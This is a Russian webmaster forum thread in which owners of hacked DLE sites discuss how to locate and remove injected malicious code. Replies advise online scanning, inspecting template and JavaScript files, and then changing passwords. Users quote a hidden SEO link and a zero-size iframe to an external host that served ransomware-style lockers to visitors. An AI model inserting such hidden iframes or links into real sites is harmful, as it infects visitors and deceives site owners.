- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Хотел создать подобную тему, но отпишу сюда... сайт на дле у меня.. смотрю проиндексированноссть страниц в яндексе, а там над каждой ссылкоц вот такое выдает Сайт может угрожать безопасности вашего компьютера.. скажите где вобще в дле искать коды эти вредные, чтобы исправить эту Сайт может угрожать безопасности вашего компьютера ?? )
Paguk_pro, юзайте virustotal - это онлайн сканер, вставьте урл и вперед...
Просмотрите все *.tpl
Еще вредоносный код может присутствовать в js файлах.
Ищите!
Paguk_pro, юзайте virustotal - это онлайн сканер, вставьте урл и вперед...
Просмотрите все *.tpl
Еще вредоносный код может присутствовать в js файлах.
Ищите!
с этим сканером ниче непонятно.. я нашел в шаблоне addcomments.tpl вот такую ссылку <a href="http://www.gnef.ru" style="display:none">2012</a> это и есть вредоносный код что ли ? долбанные хакеры блин
Нет! Это скрытая ссылка style="display:none"
вредоносный код на 1 посте топика
Нет! Это скрытая ссылка style="display:none"
вредоносный код на 1 посте топика
ну в *.tpl я везде проверил нет.. а так у меня кучу js файлов на серве.. это каждый вручную проверять что ли... жесть. может как то попроще можно..? как можно сделать групповой поиск по большому количеству файлов ? например скачать щас все файлы сайта,или же наверно ток js файлы открыть их, и ввести в поиск начало вредоносного кода..
Уже довольно долго не могу найти этот код. Гугл говорит, что на сайте присутствует такой код
Было у меня подобное. Искоренил просматривая по фтп каждый каталог двига на предмет последних по времени изменных файлов (по большому счету не так их и много там) - увидите, что есть файлы, измененные в один и тот же день, в одно и то же время, там и смотрите. Увидел такой - открывай, удаляй скрипт, сохраняй... Он обычно во многих файлах сидит (в т.ч. и в js), не всегда только в файлах шаблона ***.tpl
После этого рекомендую сменить пароли на фтп, ну и проверить свой комп на вирусы. У меня уже год как все тихо, больше не появляются.
Сегодня заметил что с моего сайта stateyki.net подгружается Блокиратор Виндоус. Знакомый посмотрев сайт обнаружил ифрейм <iframe width="0%" height="0%" style="border: 0px;" src="http://traffffff.ipq.co/"></iframe> , но что делать дальше и где искать гадость незнает.
Подскажите пожалуйста где искать (все основные файлы посмотрел , там чисто).
P.S. нашёл . всем спасибо.
Нашел код, что в первом посте не в файлах, а в коде баннера, что вставляется через рекламные материалы ДЛЕ.. Видать через админку пробрались, бо дыры все вроде залатал..